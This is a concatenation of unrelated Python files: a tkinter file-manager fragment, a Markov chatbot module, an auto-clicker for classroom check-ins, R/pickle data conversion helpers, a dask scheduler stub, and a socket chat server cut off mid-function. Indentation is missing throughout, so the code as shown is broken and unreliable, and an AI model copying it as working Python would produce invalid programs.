body.bind_class('ListLabel', '<Button-1>', lambda e:
enable_buttons(header.cut, header.copy, header.rename, header.delete) if cutcopy.get() not in ('cut', 'copy') else None, add=True)
body.bind_class('SidebarLabel', '<Button-1>',
lambda e: enable_buttons(None) if cutcopy.get() not in ('cut', 'copy') else None, add=True)
from tkinter.messagebox import askyesno
from send2trash import send2trash
F = StringVar(root, value=None)
cutcopy = StringVar(root, value=None, name='cutcopy')
curr = None
from tkinter import messagebox
def create_folder():
dialog = Toplevel(root)
dialog.title("New Folder")
dialog.transient(root)
dialog.resizable(False, False)
foldername = StringVar(root)
sure = BooleanVar(root, value=False)
def yes():
sure.set(True)
try:
os.mkdir(joinpath(os.getcwd(), foldername.get()))
dialog.destroy()
except FileExistsError:
messagebox.showerror("Folder already exists!",
"A folder with same name is already present in the current directory. Try entering another name")
except FileNotFoundError:
messagebox.showerror("Invalid Name!",
"A folder with same name is already present in the current directory. Try entering another name")
Entry(dialog, textvariable=foldername).pack(padx=5, pady=(5, 0))
Button(dialog, text='CREATE', command=yes).pack(
side='right', padx=5, pady=5)
dialog.grab_set()
root.wait_window(dialog)
dialog.grab_release()
stat = os.stat(joinpath(os.getcwd(), foldername.get()))
r = len(os.listdir())
if sure.get():
ListLabel(content.frames[os.getcwd()].window, 'dir', foldername.get(
), datetime.utcfromtimestamp(stat[-2]), stat[-4]).grid(row=r + 1, column=0, sticky='ew')
header.newfolder.config(command=create_folder)
def cut():
F.set(joinpath(os.getcwd(), ListLabel.currently_selected.name))
global curr
curr = ListLabel.currently_selected
cutcopy.set('cut')
enable_buttons(header.paste)
header.cut.config(command=cut)
def copy():
F.set(joinpath(os.getcwd(), ListLabel.currently_selected.name))
global curr
curr = ListLabel.currently_selected
cutcopy.set('copy')
enable_buttons(header.paste)
header.copy.config(command=copy)
from shutil import copyfile
def paste():
action = cutcopy.get()
cutcopy.set(None)
enable_buttons(None)
if os.getcwd() == os.path.dirname(F.get()):
return
if action == 'cut':
global curr
curr.destroy()
curr = None
(copyfile if action == 'copy' else os.rename)(
F.get(), joinpath(os.getcwd(), os.path.basename(F.get())))
ListLabel.currently_selected = None
stat = os.stat(joinpath(os.getcwd(), os.path.basename(F.get())))
s = stat[-4]
t = stat[-2]
r = len(os.listdir())
ListLabel(content.frames[os.getcwd()].window, 'dir' if s ==
4096 else 'file', os.path.basename(joinpath(os.getcwd(), os.path.basename(F.get()))), datetime.utcfromtimestamp(t), f'{s} Bytes').grid(row=r + 1, column=0, sticky='ew')
header.paste.config(command=paste)
def delete_file():
F.set(joinpath(os.getcwd(), ListLabel.currently_selected.name))
sure = askyesno(
'Confirmation', 'Are you sure you want to delete this?')
if sure:
send2trash(F.get())
ListLabel.currently_selected.destroy()
ListLabel.currently_selected = None
header.delete.config(command=delete_file)
def rename_file():
F.set(joinpath(os.getcwd(), ListLabel.currently_selected.name))
src, ext = os.path.splitext(os.path.basename(F.get()))
dialog = Toplevel(root)
dialog.title("Rename")
dialog.transient(root)
dialog.resizable(False, False)
newname = StringVar(root)
sure = BooleanVar(root, value=False)
def yes():
try:
if src == newname.get():
dialog.destroy()
return
newfile = joinpath(os.getcwd(), f'{newname.get()}{ext}')
i = 1
while os.path.exists(newfile):
newfile = joinpath(os.getcwd(), f'{newname.get()}{i}{ext}')
i += 1
os.rename(F.get(), newfile)
newname.set(os.path.basename(newfile))
sure.set(True)
dialog.destroy()
except IsADirectoryError:
messagebox.showerror("Error",
"A folder with same name already exists")
Entry(dialog, textvariable=newname).pack(padx=5, pady=(5, 0))
Button(dialog, text='OK', command=yes).pack(
side='right', padx=5, pady=5)
dialog.grab_set()
root.wait_window(dialog)
dialog.grab_release()
if sure.get():
ListLabel.currently_selected.winfo_children()[1]\
.config(text=newname.get())
ListLabel.currently_selected.name = newname.get()
header.rename.config(command=rename_file)
root.bind('<Control-Shift-n>', lambda e: header.newfolder.invoke())
root.bind('<Control-Shift-N>', lambda e: header.newfolder.invoke())
root.bind('<Control-x>', lambda e: header.cut.invoke())
root.bind('<Control-X>', lambda e: header.cut.invoke())
root.bind('<Control-c>', lambda e: header.copy.invoke())
root.bind('<Control-C>', lambda e: header.copy.invoke())
root.bind('<Control-v>', lambda e: header.paste.invoke())
root.bind('<Control-V>', lambda e: header.paste.invoke())
root.bind('<Delete>', lambda e: header.delete.invoke())
root.bind('<F2>', lambda e: header.rename.invoke())
root.mainloop()
|
markov.py
|
from . import config
from . import derpymodel
import importlib
import re
import random
import time
import threading
import markovify
import os
import common
from collections import defaultdict
version = '0.9.3.14'
model = None
unsaved = False
lines = list()
test_kwargs = {'max_overlap_ratio': config.max_overlap_ratio,
'max_overlap_total': config.max_overlap_total,
'test_output': config.test_output}
if config.sentence_max_words > 0:
test_kwargs['max_words'] = config.sentence_max_words
uri_regex = re.compile("[^\s]*:\/\/[^\s]*")
emoticon_regex = re.compile(":[DPO]|D:|[X|x]D|[Oo][_-][Oo]")
hashtag_user_regex = re.compile("^[@#][^\s]*")
commands = defaultdict(dict)
shutting_down = False
unique_words = set()
unique_word_count = 0
line_count = 0
word_count = 0
context_count = 0
console_prefix = "[DerpyMarkov] "
doing_chain = False
def reload():
importlib.reload(config)
def accepting_input():
if not shutting_down:
return True
return False
def activate(reload):
"""
Load and initialize everything then get markov running.
"""
global model, lines, main_dictionary_file, shutting_down, doing_chain
shutting_down = False
doing_chain = False
if reload:
reload()
common.console_print("DerpyMarkov version " + version, console_prefix)
common.console_print("Loading main dictionary...", console_prefix)
input_text = common.text_file_read(config.main_dictionary_file)
if input_text == '':
input_text = 'derp'
model = derpymodel.DerpyText(input_text, state_size = config.state_size1)
lines = generate_lines_from_model(True)
get_statistics(True, False)
common.console_print("Normal reply rate is " + str(config.reply_rate) + " and bot name reply rate is " + str(config.bot_name_reply_rate) + ".", console_prefix)
common.console_print("The save interval is " + str(config.save_interval) + " seconds.", console_prefix)
del input_text
setup_commands()
def get_statistics(print_to_console, return_formatted):
"""
Gets a dict of various statistics and returns them.
print: If True, we print the statistics to console as well.
"""
update_stats()
stats = {}
stats['line_count'] = line_count
stats['word_count'] = word_count
stats['unique_word_count'] = unique_word_count
stats['state_size'] = model.state_size
stats['context_count'] = context_count
output = []
output.append("I know " + str(line_count) + " lines containing a total of " + str(word_count) + " words.")
output.append(str(unique_word_count) + " of those words are unique.")
output.append("We are currently using a state size of " + str(model.state_size) + " which generated " + str(context_count) + " contexts.")
if print_to_console:
for entry in output:
common.console_print(entry, console_prefix)
if return_formatted:
return "\n".join(output)
return stats
def setup_commands():
global commands
commands['statistics']['description'] = 'List statistics for markov instance'
commands['version']['description'] = 'Get current version'
def get_command_list():
return commands
def incoming_console_command(command):
if not accepting_input():
return
if command == 'shutdown':
shutdown()
if command == 'statistics':
get_statistics(True, False)
if command == 'version':
common.console_print("derpymarkov " + version, console_prefix)
def incoming_message_command(command):
if not accepting_input():
return None
if command == 'statistics':
stats = get_statistics(False, True)
return stats
if command == 'version':
return "derpymarkov version: " + version
return None
def incoming_message(message, client_name, bot_paged, do_learn):
"""
The primary input function. At present any content from outside classes or
modules comes through here. A reply is returned if warranted, otherwise
returns None.
message: The content being passed to DerpyMarkov. Should be a string.
client_name: The current name of the client sending content.
"""
global doing_chain
if not accepting_input():
return None
if not isinstance(message, str) or message == "" or message is None:
return None
while doing_chain:
time.sleep(0.05)
make_reply = False
reply = None
split_message = message.split()
filtered_split = list()
name_fold = client_name.casefold()
for index, word in enumerate(split_message):
word_fold = word.casefold()
# Check if bot was named in message; if so, remove name and indicate bot was paged
if word_fold != name_fold and word_fold != "@" + name_fold:
filtered_split.append(word)
else:
bot_paged = True
prepared_message = prepare_message(" ".join(filtered_split))
if prepared_message == "":
return None
if do_learn:
learn(prepared_message)
reply_rand = random.uniform(0, 100.0)
if bot_paged:
make_reply = reply_rand <= config.bot_name_reply_rate
else:
make_reply = reply_rand <= config.reply_rate
if make_reply:
doing_chain = True
reply = compose_reply(prepared_message)
doing_chain = False
return reply
def prepare_message(message):
"""
So some filtering on the raw message before sending it to the markov
chain.
"""
message = message.replace('"', '')
split_message = message.split()
if not config.preserve_case:
# Check for case-sensitive things such as URIs and preserve them
for index, substring in enumerate(split_message):
if not uri_regex.match(substring)\
and not emoticon_regex.match(substring)\
and not hashtag_user_regex.match(substring):
split_message[index] = substring.lower()
filtered_message = ' '.join(split_message)
return filtered_message
def choose_key_phrase(words):
"""
Used to derive a keyword or phrase from the given text.
words: Input text to be used for key words or phrases.
"""
wordlist = model.word_split(words)
index = random.randint(0, len(wordlist))
key_phrase = wordlist[index - 1]
return key_phrase
def get_sentence(words, key_phrase):
"""
We generate sentences here and return them. Starts with the basic
make_sentence and checks for any keywords (or returns the sentence if
keywords are disabled). This gives the nicest results but tends to fail
for words that are uncommon in a dictionary
If the first method fails we attempt making a sentence with a starting
key word which has a better rate of success but the possible responses
are more limited and can feel repetitive if everything was done this way.
words: Input text to be used for key words or phrases.
key_phrase: A specific keyword or phrase can be sent for use instead.
"""
if config.use_keywords:
if config.try_all_words_for_key:
wordlist = model.word_split(words)
random.shuffle(wordlist)
else:
if key_phrase is not None:
wordlist = key_phrase
counter = 0
final_sentence = None
while counter < config.sentence_with_key_tries:
counter += 1
try:
attempt = model.make_sentence(tries = 1, **test_kwargs)
except KeyError as error:
attempt = None
if attempt is not None:
if config.use_keywords:
if final_sentence is None:
for word in wordlist:
if re.search(r'\b' + re.escape(word) + r'\b', attempt, re.IGNORECASE) is not None:
final_sentence = attempt
break
else:
final_sentence = attempt
break
if final_sentence is None:
try:
for word in wordlist:
final_sentence = model.make_sentence_with_start(word, strict = False, **test_kwargs)
if final_sentence is not None:
break
except (KeyError, markovify.text.ParamError) as error:
final_sentence = None
if final_sentence is not None:
final_sentence = clean_up_punctuation(final_sentence)
return final_sentence
def clean_up_punctuation(sentence):
sentence_fragments = model.word_split(sentence)
unmatched_open = -1
unmatched_close = -1
for index, fragment in enumerate(sentence_fragments, start = 1):
if '(' in fragment:
unmatched_open = index - 1
if ')' in fragment:
if unmatched_open != -1:
unmatched_open = -1
else:
unmatched_close = index - 1
if unmatched_open != -1:
if len(sentence_fragments) > unmatched_open + 1:
random_index = random.randrange(unmatched_open + 1, len(sentence_fragments))
else:
random_index = len(sentence_fragments);
sentence_fragments[random_index] = sentence_fragments[random_index] + ')'
if unmatched_close != -1:
if unmatched_close < 2:
sentence_fragments[unmatched_close] = '(' + sentence_fragments[unmatched_close]
else:
random_index = random.randrange(0, unmatched_close - 1)
sentence_fragments[random_index] = sentence_fragments[random_index] + '('
sentence = ' '.join(sentence_fragments)
return sentence
def compose_reply(message):
key_phrase = None
sentence = None
if config.use_keywords:
key_phrase = choose_key_phrase(message)
sentence = get_sentence(message, key_phrase)
reply = sentence
if reply == message:
reply = ""
return reply
def learn(text):
"""
Come here for some edumacation!
text: Content to be learned.
"""
global model, unsaved
if not config.learn:
return
unsaved = True
parsed_sentences = list(model.generate_corpus(text))
lines.extend(list(map(model.word_join, parsed_sentences)))
if config.update_stats_on_learn:
update_stats(parsed_sentences)
new_model = derpymodel.DerpyText(text, state_size = config.state_size1)
model = markovify.combine([ model, new_model ])
def update_stats(parsed_sentences = None):
global line_count, context_count, word_count, unique_words, unique_word_count
if parsed_sentences is None:
word_count = 0
parsed_sentences = model.parsed_sentences
for sentence in model.parsed_sentences:
for word in sentence:
word_count += 1
unique_words.add(word)
line_count = len(lines)
context_count = len(model.chain.model)
unique_word_count = len(unique_words)
def generate_lines_from_model(sort):
lines = list(map(model.word_join, model.parsed_sentences))
if sort:
return sorted(lines)
else:
return lines
def save():
"""
Writes the current lines to file. If no changes have been detected since
last save we don't need to do anything.
"""
global unsaved
if not unsaved:
return
common.console_print("Saving lines...", console_prefix)
if os.path.exists(config.main_dictionary_file) and not os.path.isfile(config.main_dictionary_file):
common.console_print("Error! " + config.main_dictionary_filename + " exists but is not a valid file. Cannot save lines.", console_prefix)
return
if not os.path.exists(config.main_dictionary_file):
os.makedirs(config.absolute_dictionary_directory, exist_ok = True)
common.console_print(config.main_dictionary_filename + " was not found. Creating new file...", console_prefix)
with threading.Lock():
with open(config.main_dictionary_file, '+w', encoding = "utf8") as text:
text.write('\n'.join(sorted(lines)))
text.close()
common.console_print("Lines saved!", console_prefix)
unsaved = False
def shutdown():
"""
Let's do a clean shutdown here.
"""
global model, shutting_down
shutting_down = True
save()
del model
common.console_print("DerpyMarkov is shutting down now.", console_prefix)
return True
def timed_loop():
while not shutting_down:
if config.save_interval - (time.time() % config.save_interval) < 1:
save()
time.sleep(1.0)
timed_loop_thread = threading.Thread(target = timed_loop, args = [])
timed_loop_thread.start()
|
main.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# --------------------------------------------------------
# 疼讯课堂小助手 (TXClass Helper) Ver 0.6
# Copyright (c) 2022 MoeTwo Studio
# Licensed under The MIT License
# Written by Coolsong
# 提示:在运行本程序前请先阅读自述文件。
# Tip: Please read the readme file before running this.
# --------------------------------------------------------
import base64 # 引入编码库
import threading # 开线程
from time import sleep
import os
import cv2
import pyautogui
import pyscreeze
import datetime
from tkinter import *
from tkinter.font import Font
from tkinter.ttk import *
import tkinter.messagebox
import winsound
class Application_ui(Frame):
# 这个类仅实现界面生成功能,具体事件处理代码在子类Application中。
def __init__(self, master=None):
Frame.__init__(self, master)
self.master.title('疼讯课堂小助手 v0.6')
self.master.geometry('350x400')
self.master.resizable(0, 0) # 禁止拉伸
self.createWidgets()
def createWidgets(self):
self.top = self.winfo_toplevel()
self.style = Style()
self.style.configure('TCommand.TButton', font=('微软雅黑', 9))
self.TextFont = Font(font=('微软雅黑', 9))
self.Command1 = Button(self.top, text='开始运行', command=self.Command1_Cmd, style='TCommand.TButton')
self.Command1.place(x=10, y=10, width=70, height=30)
self.Command2 = Button(self.top, text='清空日志', command=self.Command2_Cmd, style='TCommand.TButton')
self.Command2.place(x=100, y=10, width=70, height=30)
self.Label = Label(self.top, text="使用场景", font=self.TextFont)
self.Label.place(x=190, y=15)
v = IntVar()
v.set(0)
self.Command3 = Radiobutton(self.top, text='客户端', variable=v, value=0, command=self.Command3_Cmd)
self.Command3.place(x=190, y=45)
self.Command4 = Radiobutton(self.top, text='网页版', variable=v, value=1, command=self.Command4_Cmd)
self.Command4.place(x=260, y=45)
self.Command5 = Button(self.top, text='查看截图', command=self.Command5_Cmd, style='TCommand.TButton')
self.Command5.place(x=10, y=50, width=160, height=30)
self.sep1 = Separator(self.top, orient=HORIZONTAL)
self.sep1.pack(padx=10, pady=95, fill='x')
self.Label = Label(self.top, text="运行日志", font=self.TextFont)
self.Label.place(x=10, y=115)
self.Text = Text(self.top, fg='#bbbbbb', bg='#3c3f41', font=self.TextFont)
self.Text.place(x=10, y=140, width=330, height=250)
class Application(Application_ui):
# 这个类实现具体的事件处理回调函数。界面生成代码在Application_ui中。
def __init__(self, master=None):
Application_ui.__init__(self, master)
def clickCheck(self):
time = datetime.datetime.now().strftime('%H时%M分%S秒')
try:
self.Text.insert('1.0', f"{time}-监测进程已启动\n")
winsound.Beep(600, 500)
while 1:
# 先截图
screenshot = pyscreeze.screenshot('temp_screenshot.png')
# 读取图片 灰色会快
temp = cv2.imread(r'temp_screenshot.png', cv2.IMREAD_GRAYSCALE)
theight, twidth = target.shape[:2]
tempheight, tempwidth = temp.shape[:2]
# print("目标图宽高:" + str(twidth) + "-" + str(theight))
# print("模板图宽高:" + str(tempwidth) + "-" + str(tempheight))
# 先缩放屏幕截图 INTER_LINEAR INTER_AREA
scaleTemp = cv2.resize(temp, (int(tempwidth / screenScale), int(tempheight / screenScale)))
stempheight, stempwidth = scaleTemp.shape[:2]
# print("缩放后模板图宽高:" + str(stempwidth) + "-" + str(stempheight))
# 匹配图片
res = cv2.matchTemplate(scaleTemp, target, cv2.TM_CCOEFF_NORMED)
mn_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
if max_val >= 0.9:
time = datetime.datetime.now().strftime('%H时%M分%S秒')
# 计算出中心点
top_left = max_loc
bottom_right = (top_left[0] + twidth, top_left[1] + theight)
tagHalfW = int(twidth / 2)
tagHalfH = int(theight / 2)
tagCenterX = top_left[0] + tagHalfW
tagCenterY = top_left[1] + tagHalfH
# 左键点击屏幕上的这个位置
pyautogui.click(tagCenterX, tagCenterY, button='left')
self.Text.insert('1.0', f"{time}-发现签到,已尝试点击并于1秒后对结果进行截图\n")
winsound.Beep(1000, 1000)
sleep(1)
screenshot = pyscreeze.screenshot(f'result/{time}.png')
sleep(5)
except Exception as err:
time = datetime.datetime.now().strftime('%H时%M分%S秒')
self.Text.insert('1.0', f"{time}-ERROR!错误信息:\n{err}\n")
self.Command1['text'] = '发生错误'
winsound.Beep(600, 1000)
tkinter.messagebox.showerror('错误', f'监测进程发生错误,请尝试重新运行程序!\n时间:{time}')
def command1(self):
global screenScale, target
# 屏幕缩放系数 mac缩放是2 windows一般是1
screenScale = 1
# 事先读取按钮截图
if button_img == '':
tkinter.messagebox.showinfo('提示', '请先选择使用场景')
else:
target = cv2.imread(rf"{button_img}", cv2.IMREAD_GRAYSCALE)
if not os.path.exists("result/"): # 新建文件夹
os.mkdir("result/")
time = datetime.datetime.now().strftime('%H时%M分%S秒')
self.Command1.configure(state=DISABLED)
self.Command3.configure(state=DISABLED)
self.Command4.configure(state=DISABLED)
self.Command1['text'] = '正在运行'
self.Text.insert('1.0', f"{time}-开始运行\n=====\n提示:请以管理员身份运行本程序\n否则有可能无法执行点击操作\n操作方法:右键点击本程序选择'以管理员身份运行'\n"
f"=====\n")
self.clickCheck()
pass
def command2(self):
self.Text.delete("1.0", END)
def Command1_Cmd(self, event=None):
self.thread_it(self.command1)
def Command2_Cmd(self, event=None):
self.thread_it(self.command2)
def Command3_Cmd(self, event=None):
global button_img
button_img = 'pc.png'
time = datetime.datetime.now().strftime('%H时%M分%S秒')
self.Text.insert('1.0', f"{time}-使用场景已设置为:客户端\n")
def Command4_Cmd(self, event=None):
global button_img
button_img = 'web.png'
time = datetime.datetime.now().strftime('%H时%M分%S秒')
self.Text.insert('1.0', f"{time}-使用场景已设置为:网页端\n")
def Command5_Cmd(self, event=None):
if not os.path.exists("result/"):
time = datetime.datetime.now().strftime('%H时%M分%S秒')
self.Text.insert('1.0', f"{time}-提示:你还没有运行截图,请先运行再试!\n")
else:
os.startfile("result")
@staticmethod
def thread_it(func, *args):
t = threading.Thread(target=func, args=args)
t.setDaemon(True) # 守护--就算主界面关闭,线程也会留守后台运行(不对!)
t.start() # 启动
# t.join() # 阻塞--会卡死界面!
if __name__ == "__main__":
button_img = ''
img = '''AAABAAEAEBAAAAEAIABoBAAAFgAAACgAAAAQAAAAIAAAAAEAIAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/31nLv99Zy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/gIAC/4JmZP+BZ+X/gWfl/4JmZP+AgAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/gGgc/oBml/+Faev/gWj9/4Fn/f+Fauv+gGaX/4BmGgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP+AAAL/hGMY/35osf+Kbe//fmrn/4lgkf+JYJH/fmrn/4hs7/+AZrv/gGU+AAAAAAAAAAAAAAAAAAAAAAAAAAD/uToG/8Q0dv+QWpX/gm61/plUkf/FOLn/xDe5/5pTjf6Ba8X/hmz3/oBlsf+qqgIAAAAAAAAAAAAAAAAAAAAA/79ABv/JMsH/wzfF/7RDn//FNcv/zjPx/80y8f/JNcn/rUiZ/4Zpsf99Z8f+hoYEAAAAAAAAAAAAAAAAAAAAAP+/QAL/yTPR/88z9//PM9v/yjP7/8o0///JL///yzP7/88z0f+4Qav/jluD/4CAAgAAAAAAAAAAAAAAAP+qVQL/yTM8/8oz4//MM///zDP//8kz///cfP//0E7//8ct///MMv//zzPj/8Q3qf/LNDz/qlUCAAAAAP/LNBr+yDNU/8w0tf/LM/n/yTP//8kz///IMv//8cv//+qw///UYP//yTX//8sz///MMvf+zjSz/8gzVv/HMxr/yDJU/8kzz//PNf//yjP//8kz///JM///yDH///Xc/////v//7b3//81E///IL///yjP//881///JM9H/yDJU/8cyVv/KM7n/zTTt/8sz///JM///yTP//8gx///12///+Of//+qw///NRv//yDD//8sz///NNO3/yjO5/8kyVgAAAAD/yzMo/8o0mf/PNOH/yjP//8oz///IMv//7b3//+KT///KOv//yC7//8o0///PNOH/yjSZ/8YyKAAAAAAAAAAAAAAAAP/INwz/yzNw/8sz2f/NNPn/yjT//9JW///IL///yTD//800+f/LM9v/yzNw/8g3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP/KMkL/yzPD/9A08//ILf//yTP//9A08//LM8P/xzFEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/78uGv7JNJ3/zDT3/8w09/7LNJ3/yC4aAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/8k0if/LNIkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//8AAP5/AAD4HwAA8A8AAPAHAADgBwAA4AcAAOAHAADAAwAAgAEAAIABAADAAwAA8A8AAPgfAAD8PwAA/n8AAA== '''
tmp = open("tmp.ico", "wb+")
tmp.write(base64.b64decode(img))
tmp.close()
top = Tk()
top.iconbitmap('tmp.ico')
os.remove("tmp.ico") # 删掉临时文件
Application(top).mainloop()
|
dsc_io.py
|
#!/usr/bin/env python
__author__ = "Gao Wang"
__copyright__ = "Copyright 2016, Stephens lab"
__email__ = "gaow@uchicago.edu"
__license__ = "MIT"
'''
Test rpy2 installation:
python -m 'rpy2.tests'
'''
from dsc.utils import flatten_list
def load_mpk(mpk_files, jobs=2):
import msgpack, collections
from multiprocessing import Process, Manager
from .utils import chunks
if isinstance(mpk_files, str):
return msgpack.unpackb(open(mpk_files, "rb").read(),
encoding='utf-8',
object_pairs_hook=collections.OrderedDict)
d = Manager().dict()
def f(d, x):
for xx in x:
d.update(
msgpack.unpackb(open(xx, "rb").read(),
encoding='utf-8',
object_pairs_hook=collections.OrderedDict))
#
mpk_files = [x for x in chunks(mpk_files, int(len(mpk_files) / jobs) + 1)]
job_pool = [Process(target=f, args=(d, x)) for x in mpk_files]
for job in job_pool:
job.start()
for job in job_pool:
job.join()
return collections.OrderedDict([
(x, d[x]) for x in sorted(d.keys(), key=lambda x: int(x.split(':')[0]))
])
def load_rds(filename, types=None):
import os
import pandas as pd, numpy as np
import rpy2.robjects as RO
import rpy2.robjects.vectors as RV
import rpy2.rinterface as RI
from rpy2.robjects import numpy2ri
numpy2ri.activate()
from rpy2.robjects import pandas2ri
pandas2ri.activate()
def load(data, types, rpy2_version=3):
if types is not None and not isinstance(data, types):
return np.array([])
# FIXME: I'm not sure if I should keep two versions here
# rpy2_version 2.9.X is more tedious but it handles BoolVector better
# rpy2 version 3.0.1 converts bool to integer directly without dealing with
# NA properly. It gives something like (0,1,-234235).
# Possibly the best thing to do is to open an issue for it to the developers.
if rpy2_version == 2:
# below works for rpy2 version 2.9.X
if isinstance(data, RI.RNULLType):
res = None
elif isinstance(data, RV.BoolVector):
data = RO.r['as.integer'](data)
res = np.array(data, dtype=int)
# Handle c(NA, NA) situation
if np.sum(np.logical_and(res != 0, res != 1)):
res = res.astype(float)
res[res < 0] = np.nan
res[res > 1] = np.nan
elif isinstance(data, RV.FactorVector):
data = RO.r['as.character'](data)
res = np.array(data, dtype=str)
elif isinstance(data, RV.IntVector):
res = np.array(data, dtype=int)
elif isinstance(data, RV.FloatVector):
res = np.array(data, dtype=float)
elif isinstance(data, RV.StrVector):
res = np.array(data, dtype=str)
elif isinstance(data, RV.DataFrame):
res = pd.DataFrame(data)
elif isinstance(data, RV.Matrix):
res = np.matrix(data)
elif isinstance(data, RV.Array):
res = np.array(data)
else:
# I do not know what to do for this
# But I do not want to throw an error either
res = str(data)
else:
if isinstance(data, RI.NULLType):
res = None
else:
res = data
if isinstance(res, np.ndarray) and res.shape == (1, ):
res = res[0]
return res
def load_dict(res, data, types):
'''load data to res'''
names = data.names if not isinstance(data.names, RI.NULLType) else [
i + 1 for i in range(len(data))
]
for name, value in zip(names, list(data)):
if isinstance(value, RV.ListVector):
res[name] = {}
res[name] = load_dict(res[name], value, types)
else:
res[name] = load(value, types)
return res
#
if not os.path.isfile(filename):
raise IOError('Cannot find file ``{}``!'.format(filename))
rds = RO.r['readRDS'](filename)
if isinstance(rds, RV.ListVector):
res = load_dict({}, rds, types)
else:
res = load(rds, types)
return res
def save_rds(data, filename):
import collections, re
import pandas as pd
import numpy as np
import rpy2.robjects as RO
import rpy2.rinterface as RI
from rpy2.robjects import numpy2ri
numpy2ri.activate()
from rpy2.robjects import pandas2ri
pandas2ri.activate()
# Supported data types:
# int, float, str, tuple, list, numpy array
# numpy matrix and pandas dataframe
int_type = (int, np.int8, np.int16, np.int32, np.int64)
float_type = (float, np.float)
def assign(name, value):
name = re.sub(r'[^\w' + '_.' + ']', '_', name)
if isinstance(value, (tuple, list)):
if all(isinstance(item, int_type) for item in value):
value = np.asarray(value, dtype=int)
elif all(isinstance(item, float_type) for item in value):
value = np.asarray(value, dtype=float)
else:
value = np.asarray(value)
if isinstance(value, np.matrix):
value = np.asarray(value)
if isinstance(
value,
tuple(flatten_list((str, float_type, int_type, np.ndarray)))):
if isinstance(value, np.ndarray) and value.dtype.kind == "u":
value = value.astype(int)
RO.r.assign(name, value)
elif isinstance(value, pd.DataFrame):
# FIXME: does not always work well for pd.DataFrame
RO.r.assign(name, value)
elif value is None:
RO.r.assign(name, RI.NULL)
else:
raise ValueError(
"Saving ``{}`` to RDS file is not supported!".format(
str(type(value))))
#
def assign_dict(name, value):
RO.r('%s <- list()' % name)
for k, v in value.items():
k = re.sub(r'[^\w' + '_.' + ']', '_', str(k))
if k.isdigit():
k = str(k)
if isinstance(v, collections.Mapping):
assign_dict('%s$%s' % (name, k), v)
else:
assign('item', v)
RO.r('%s$%s <- item' % (name, k))
#
if isinstance(data, collections.Mapping):
assign_dict('res', data)
else:
assign('res', data)
RO.r("saveRDS(res, '%s')" % filename)
def load_dsc(infiles):
import pickle, yaml
if isinstance(infiles, str):
infiles = [infiles]
res = dict()
for infile in infiles:
if infile.endswith('.pkl'):
data = pickle.load(open(infile, 'rb'))
elif infile.endswith('.rds'):
data = load_rds(infile)
elif infile.endswith('.yml'):
data = yaml.safe_load(open(infile).read())
else:
raise ValueError(f'``{infile}`` is not supported DSC data format')
try:
res.update(data)
except Exception:
# loaded a non-recursive object
return data
return res
def convert_dsc(pkl_files, jobs=2):
import pickle
from multiprocessing import Process
from .utils import chunks
def convert(d):
for ff in d:
if not ff.endswith('pkl'):
raise ValueError(f'``{ff}`` is not supported DSC data format')
save_rds(pickle.load(open(ff, 'rb')), ff[:-4] + '.rds')
#
if isinstance(pkl_files, str):
convert([pkl_files])
return 0
#
pkl_files = [x for x in chunks(pkl_files, int(len(pkl_files) / jobs) + 1)]
job_pool = [Process(target=convert, args=(x, )) for x in pkl_files]
for job in job_pool:
job.start()
for job in job_pool:
job.join()
return 0
def symlink_force(target, link_name):
import os, errno
try:
os.symlink(target, link_name)
except OSError as e:
if e.errno == errno.EEXIST:
os.remove(link_name)
os.symlink(target, link_name)
else:
raise e
def csv_to_html(infile, outfile):
import os
import pandas as pd
pd.set_option('display.max_colwidth', -1)
from dsc.constant import TABLE_HEADER
def pop_html_img(x):
if not isinstance(x, str):
return x
if not (x.endswith('.png') or x.endswith('.jpg')):
return x
base, name = os.path.split(x)
if os.path.isfile(name):
full_path = False
elif os.path.isfile(x):
full_path = True
else:
return x
content = f'''<a href="{x if full_path else name}" onmouseover="showPopup(this, '{x if full_path else name}')" onmouseout="hidePopup()">{name if len(name) < 15 else "Image"}</a> <div id="popup"> </div></td>'''
return content
data = pd.read_csv(infile).applymap(pop_html_img)
with open(outfile, 'w') as f:
f.write(TABLE_HEADER + data.to_html(justify='center', escape=False))
def main():
import os, sys, pickle
if len(sys.argv) < 3:
sys.exit(0)
# Input is pkl, output is rds
infile = sys.argv[1]
outfile = sys.argv[2]
if '-f' in sys.argv:
try:
os.remove(outfile)
except Exception:
pass
if not os.path.isfile(outfile):
if infile.endswith('.pkl') and outfile.endswith('.rds'):
save_rds(pickle.load(open(infile, 'rb')), outfile)
elif infile.endswith('.rds') and outfile.endswith('.pkl'):
pickle.dump(load_rds(infile), open(outfile, 'wb'))
elif infile.endswith('.csv') and outfile.endswith('.html'):
csv_to_html(infile, outfile)
else:
sys.exit(1)
return 0
if __name__ == '__main__':
import warnings
from rpy2.rinterface import RRuntimeWarning
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=RRuntimeWarning)
main()
|
untitled1.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 22 16:57:44 2019
@author: cliffk
"""
from distributed import Scheduler
from tornado.ioloop import IOLoop
from threading import Thread
loop = IOLoop.current()
t = Thread(target=loop.start, daemon=True)
t.start()
s = Scheduler(loop=loop)
s.start('tcp://:8786') # Listen on TCP port 8786
|
myServer.py
|
import threading
import socket
import sys
#Host and port declaration (uses localhost)
host = '127.0.0.1'
port = 8080
#Creates socket
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Server binding
server.bind((host, port))
server.listen()
#Handles the client messeges
def clientHandler(client, address):
#Constanlty checks for incoming messages
while True:
#Brodcasts message to client
try:
message = client.recv(1024).decode('ascii')
#Checks for client request to disconect
if message == '#exit':
#Sends disconect confirmation to client
client.send(f"You have been disconecded".encode('ascii'))
